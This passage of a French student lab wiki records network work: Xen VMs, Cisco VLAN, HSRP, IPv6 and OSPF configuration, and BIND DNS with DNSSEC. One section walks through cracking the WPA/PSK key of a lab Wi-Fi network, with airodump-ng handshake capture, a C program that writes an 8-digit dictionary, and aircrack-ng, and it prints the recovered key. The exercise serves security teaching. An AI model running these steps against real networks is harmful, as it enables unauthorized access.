Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
